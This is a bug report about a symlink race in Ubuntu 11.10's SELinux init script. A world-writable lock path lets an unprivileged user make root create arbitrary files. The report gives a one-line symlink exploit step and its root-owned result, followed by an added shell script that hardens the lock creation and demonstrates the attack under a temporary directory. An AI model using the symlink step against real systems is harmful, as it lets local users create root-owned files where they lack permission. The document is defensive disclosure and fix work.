I think there might be a problem with the startup script /etc/init.d/selinux that allows an unprivileged user to create a file in any directory. I am copying a message I sent to Jamie Strandboge -
In my Ubuntu 11.10 (Oneiric), the script /etc/init.d/selinux contains:
statusfile=/.autorelabel
...
lockfile=/var/lock/selinux-relabel
...
# Start only creates the lock
start() {
	log_daemon_msg "Starting SELinux autorelabel"
	if [ -e $statusfile ]; then
		log_warning_msg "A relabel has already been requested. Please reboot to finish relabeling your system."
		log_end_msg 0
	else
		/usr/bin/touch $lockfile
		log_end_msg 0
	fi
}
As /var/lock is world writable, a user could presumably create a file in any location by making this a symlink. Admittedly, /var/lock does not persist across reboots (tmpfs), and once selinux-relabel has been created by root it cannot be changed, but if the administrator, for example, restarts the daemon, in this gap the user could create the file. I confirmed this to be the case on my machine. Or, if selinux is installed for the first time, then too shall a link be followed if it is pre-created.
Please let me know if further details are required.
To exploit:
When SELinux is not installed or the autorelabel daemon is stopped through e.g., /etc/init.d/selinux stop
unpriv-user$ ln -s /etc/file_to_create /var/lock/selinux-relabel
When /etc/init.d/selinux start happens,
# ls -l /etc/file_to_create
-rw-r--r--. 1 root root 0 2011-10-17 20:29 /etc/file_to_create
Thanks,
Hayawardh Vijayakumar.
Details:
# lsb_release -rd
Description: Ubuntu 11.10
Release: 11.10
# apt-cache policy selinux
  Installed: 1:0.9
  Candidate: 1:0.9
  Version table:
 *** 1:0.9 0
        500 http://us.archive.ubuntu.com/ubuntu/ lucid/universe Packages
        100 /var/lib/dpkg/status
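One way to harden the "/usr/bin/touch $lockfile" step, as an added example that is not the Ubuntu package's code: refuse to create the lock when any directory entry (including a dangling symlink) already exists, and create it under the shell's noclobber mode so the open uses O_CREAT|O_EXCL and does not follow a planted link. The demo reproduces the report's scenario under a temporary directory (all paths are constructed), so it runs as an unprivileged user; the durable fix is still a lock location that unprivileged users cannot write to.

```shell
#!/bin/sh
# Hardened replacement for the `/usr/bin/touch $lockfile` step.
# Added example, not code from the Ubuntu selinux package: all paths are
# constructed under a temporary directory so it runs as an unprivileged user.

# Create $1 only if no entry of that name exists, symlink or otherwise.
# `set -C` (noclobber) makes the `>` redirection open the path with
# O_CREAT|O_EXCL, which fails on an existing entry, including a dangling
# symlink, instead of following it to the target as touch(1) does.
safe_create_lock() {
    lock=$1
    if [ -L "$lock" ] || [ -e "$lock" ]; then
        echo "refusing: $lock already exists (possible symlink attack)" >&2
        return 1
    fi
    # Subshell so noclobber does not leak into the caller.
    ( set -C; : > "$lock" ) 2>/dev/null || return 1
    return 0
}

# Reproduce the report's scenario: a world-writable lock directory holds a
# user-planted symlink pointing at a file that should not be created.
demo() {
    tmp=$(mktemp -d) || return 2
    mkdir "$tmp/lock" "$tmp/etc"
    ln -s "$tmp/etc/file_to_create" "$tmp/lock/selinux-relabel"

    # Vulnerable behaviour: touch follows the symlink and creates the target.
    touch "$tmp/lock/selinux-relabel"
    [ -e "$tmp/etc/file_to_create" ] && vulnerable=1 || vulnerable=0
    rm -f "$tmp/etc/file_to_create"

    # Hardened behaviour: creation is refused and the target stays absent.
    if safe_create_lock "$tmp/lock/selinux-relabel"; then hardened=0; else hardened=1; fi
    [ -e "$tmp/etc/file_to_create" ] && hardened=0

    # Sanity check: with no pre-existing entry the lock is a regular file.
    rm -f "$tmp/lock/selinux-relabel"
    safe_create_lock "$tmp/lock/selinux-relabel" && [ -f "$tmp/lock/selinux-relabel" ] \
        && [ ! -L "$tmp/lock/selinux-relabel" ] && normal=1 || normal=0

    rm -rf "$tmp"
    echo "vulnerable=$vulnerable hardened=$hardened normal=$normal"
    [ "$vulnerable" = 1 ] && [ "$hardened" = 1 ] && [ "$normal" = 1 ]
}
```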